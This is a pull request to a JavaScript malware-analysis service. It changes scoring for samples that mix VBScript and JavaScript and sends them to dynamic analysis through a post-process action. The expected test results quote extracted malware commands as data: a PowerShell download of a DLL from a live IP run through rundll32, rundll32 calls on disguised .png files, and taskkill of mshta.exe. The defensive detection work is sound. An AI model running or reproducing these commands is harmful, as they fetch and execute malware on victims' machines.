### PR TITLE
Use post-process actions to resubmit to dynamic, not a high score

### DIFF
--- a/jsjaws.py
+++ b/jsjaws.py
@@ -2024,6 +2024,7 @@ class JsJaws(ServiceBase):
         if vb_and_js_scripts:
             heur = Heuristic(12)
             vb_and_js_section = ResultTextSection(heur.name, heuristic=heur, parent=request.result, body=heur.description)
+            vb_and_js_section.add_tag("file.behavior", heur.name)
 
             # We want to extract all VBScripts IFF there are both JavaScript and VBScript scripts in the file
             for script in scripts:

--- a/service_manifest.yml
+++ b/service_manifest.yml
@@ -194,7 +194,7 @@ heuristics:
 
   - heur_id: 12
     name: Visual Basic and JavaScript
-    score: 500
+    score: 1
     filetype: '.*'
     description: Sample uses a combination of both Visual Basic and JavaScript
 

--- a/tests/results/3eadb018d45336f73e6c0f620de84057eb2ffb214f0deb699434aaa01e64a28d/result.json
+++ b/tests/results/3eadb018d45336f73e6c0f620de84057eb2ffb214f0deb699434aaa01e64a28d/result.json
@@ -1,7 +1,7 @@
 {
   "extra": {
     "drop_file": false,
-    "score": 1632,
+    "score": 1133,
     "sections": [
       {
         "auto_collapse": false,
@@ -11,7 +11,13 @@
         "classification": "TLP:C",
         "depth": 0,
         "heuristic": null,
-        "tags": {},
+        "tags": {
+          "file": {
+            "behavior": [
+              "Visual Basic and JavaScript"
+            ]
+          }
+        },
         "title_text": "Visual Basic and JavaScript",
         "zeroize_on_tag_safe": false
       },
@@ -31,7 +37,7 @@
           "attack_ids": [],
           "frequency": 1,
           "heur_id": 12,
-          "score": 500,
+          "score": 1,
           "score_map": {},
           "signatures": {
             "suspicious_url_found": 1
@@ -408,6 +414,13 @@
             "wscript_curl_url"
           ],
           "value": "taskkill /f /im mshta.exe"
+        }
+      ],
+      "file.behavior": [
+        {
+          "heur_id": null,
+          "signatures": [],
+          "value": "Visual Basic and JavaScript"
         }
       ],
       "file.string.extracted": [

--- a/tests/results/6780a74641680b48e143386740bfb8cf380466a75a6c2a09478c8e26dc04ee13/result.json
+++ b/tests/results/6780a74641680b48e143386740bfb8cf380466a75a6c2a09478c8e26dc04ee13/result.json
@@ -1,7 +1,7 @@
 {
   "extra": {
     "drop_file": false,
-    "score": 1402,
+    "score": 903,
     "sections": [
       {
         "auto_collapse": false,
@@ -33,11 +33,17 @@
           "attack_ids": [],
           "frequency": 1,
           "heur_id": 12,
-          "score": 500,
+          "score": 1,
           "score_map": {},
           "signatures": {}
         },
-        "tags": {},
+        "tags": {
+          "file": {
+            "behavior": [
+              "Visual Basic and JavaScript"
+            ]
+          }
+        },
         "title_text": "Visual Basic and JavaScript",
         "zeroize_on_tag_safe": false
       },
@@ -403,6 +409,13 @@
             "wscript_cmd_url"
           ],
           "value": "cmd.exe cmd /c start /min powershell IWR -uri http://165.22.160.25/w9edb/160223 -o %temp%\\adeP1F.dll;start-process rundll32 %temp%\\adeP1F.dll N115"
+        }
+      ],
+      "file.behavior": [
+        {
+          "heur_id": 12,
+          "signatures": [],
+          "value": "Visual Basic and JavaScript"
         }
       ],
       "file.string.extracted": [

--- a/tests/results/7ed2a67febed6703359258ad597946bd5c07bc4b1313f32b1d82281d09810f9f/result.json
+++ b/tests/results/7ed2a67febed6703359258ad597946bd5c07bc4b1313f32b1d82281d09810f9f/result.json
@@ -1,7 +1,7 @@
 {
   "extra": {
     "drop_file": false,
-    "score": 871,
+    "score": 372,
     "sections": [
       {
         "auto_collapse": false,
@@ -14,11 +14,17 @@
           "attack_ids": [],
           "frequency": 1,
           "heur_id": 12,
-          "score": 500,
+          "score": 1,
           "score_map": {},
           "signatures": {}
         },
-        "tags": {},
+        "tags": {
+          "file": {
+            "behavior": [
+              "Visual Basic and JavaScript"
+            ]
+          }
+        },
         "title_text": "Visual Basic and JavaScript",
         "zeroize_on_tag_safe": false
       },
@@ -228,6 +234,13 @@
           "heur_id": null,
           "signatures": [],
           "value": "flasks/data.txt"
+        }
+      ],
+      "file.behavior": [
+        {
+          "heur_id": 12,
+          "signatures": [],
+          "value": "Visual Basic and JavaScript"
         }
       ]
     },

--- a/tests/results/a8b6bac764f3178d130f50949c19f37c5310b23cdc0cba66569e047b732844c4/result.json
+++ b/tests/results/a8b6bac764f3178d130f50949c19f37c5310b23cdc0cba66569e047b732844c4/result.json
@@ -1,7 +1,7 @@
 {
   "extra": {
     "drop_file": false,
-    "score": 750,
+    "score": 251,
     "sections": [
       {
         "auto_collapse": false,
@@ -14,11 +14,17 @@
           "attack_ids": [],
           "frequency": 1,
           "heur_id": 12,
-          "score": 500,
+          "score": 1,
           "score_map": {},
           "signatures": {}
         },
-        "tags": {},
+        "tags": {
+          "file": {
+            "behavior": [
+              "Visual Basic and JavaScript"
+            ]
+          }
+        },
         "title_text": "Visual Basic and JavaScript",
         "zeroize_on_tag_safe": false
       },
@@ -74,7 +80,15 @@
         ]
       }
     ],
-    "tags": {},
+    "tags": {
+      "file.behavior": [
+        {
+          "heur_id": 12,
+          "signatures": [],
+          "value": "Visual Basic and JavaScript"
+        }
+      ]
+    },
     "temp_submission_data": {}
   }
 }

--- a/tests/results/b86808fa91902548e429018297f01d9ae76b319fb192fc095e8d40e6aaed71c4/result.json
+++ b/tests/results/b86808fa91902548e429018297f01d9ae76b319fb192fc095e8d40e6aaed71c4/result.json
@@ -1,7 +1,7 @@
 {
   "extra": {
     "drop_file": false,
-    "score": 1632,
+    "score": 1133,
     "sections": [
       {
         "auto_collapse": false,
@@ -11,7 +11,13 @@
         "classification": "TLP:C",
         "depth": 0,
         "heuristic": null,
-        "tags": {},
+        "tags": {
+          "file": {
+            "behavior": [
+              "Visual Basic and JavaScript"
+            ]
+          }
+        },
         "title_text": "Visual Basic and JavaScript",
         "zeroize_on_tag_safe": false
       },
@@ -31,7 +37,7 @@
           "attack_ids": [],
           "frequency": 1,
           "heur_id": 12,
-          "score": 500,
+          "score": 1,
           "score_map": {},
           "signatures": {
             "suspicious_url_found": 1
@@ -402,6 +408,13 @@
             "wscript_curl_url"
           ],
           "value": "rundll32 C:\\ProgramData\\index1.png,Wind "
+        }
+      ],
+      "file.behavior": [
+        {
+          "heur_id": null,
+          "signatures": [],
+          "value": "Visual Basic and JavaScript"
         }
       ],
       "file.string.extracted": [

--- a/tests/results/f0a00d22892a3885f4c041e919ee872a3da5d84fe04700e1c3507f22af70ab3d/result.json
+++ b/tests/results/f0a00d22892a3885f4c041e919ee872a3da5d84fe04700e1c3507f22af70ab3d/result.json
@@ -1,7 +1,7 @@
 {
   "extra": {
     "drop_file": false,
-    "score": 1632,
+    "score": 1133,
     "sections": [
       {
         "auto_collapse": false,
@@ -11,7 +11,13 @@
         "classification": "TLP:C",
         "depth": 0,
         "heuristic": null,
-        "tags": {},
+        "tags": {
+          "file": {
+            "behavior": [
+              "Visual Basic and JavaScript"
+            ]
+          }
+        },
         "title_text": "Visual Basic and JavaScript",
         "zeroize_on_tag_safe": false
       },
@@ -31,7 +37,7 @@
           "attack_ids": [],
           "frequency": 1,
           "heur_id": 12,
-          "score": 500,
+          "score": 1,
           "score_map": {},
           "signatures": {
             "suspicious_url_found": 1
@@ -402,6 +408,13 @@
             "wscript_curl_url"
           ],
           "value": "rundll32 C:\\ProgramData\\121.png,Wind "
+        }
+      ],
+      "file.behavior": [
+        {
+          "heur_id": null,
+          "signatures": [],
+          "value": "Visual Basic and JavaScript"
         }
       ],
       "file.string.extracted": [

--- a/tests/results/f1b65c29b1d37c4360e92d429613d9b7f3a17bbf34cee8032a5df597685bb358/result.json
+++ b/tests/results/f1b65c29b1d37c4360e92d429613d9b7f3a17bbf34cee8032a5df597685bb358/result.json
@@ -1,7 +1,7 @@
 {
   "extra": {
     "drop_file": false,
-    "score": 1632,
+    "score": 1133,
     "sections": [
       {
         "auto_collapse": false,
@@ -11,7 +11,13 @@
         "classification": "TLP:C",
         "depth": 0,
         "heuristic": null,
-        "tags": {},
+        "tags": {
+          "file": {
+            "behavior": [
+              "Visual Basic and JavaScript"
+            ]
+          }
+        },
         "title_text": "Visual Basic and JavaScript",
         "zeroize_on_tag_safe": false
       },
@@ -31,7 +37,7 @@
           "attack_ids": [],
           "frequency": 1,
           "heur_id": 12,
-          "score": 500,
+          "score": 1,
           "score_map": {},
           "signatures": {
             "suspicious_url_found": 1
@@ -408,6 +414,13 @@
             "wscript_curl_url"
           ],
           "value": "taskkill /f /im mshta.exe"
+        }
+      ],
+      "file.behavior": [
+        {
+          "heur_id": null,
+          "signatures": [],
+          "value": "Visual Basic and JavaScript"
         }
       ],
       "file.string.extracted": [


### PR DESCRIPTION
Use the following post-process action to resubmit these files to dynamic analysis, rather than just arbitrarily scoring these files 500+

```
# We cannnot statically analyze files that have this tag, so send them all to Dynamic
resubmit_vbs_and_js:
  archive_submission: false
  enabled: true
  filter: 'tags.file.behavior:"Visual Basic and JavaScript"'
  raise_alert: false
  resubmit:
    additional_services: ["Dynamic Analysis"]
  run_on_cache: false
  run_on_completed: true
  webhook: null  
```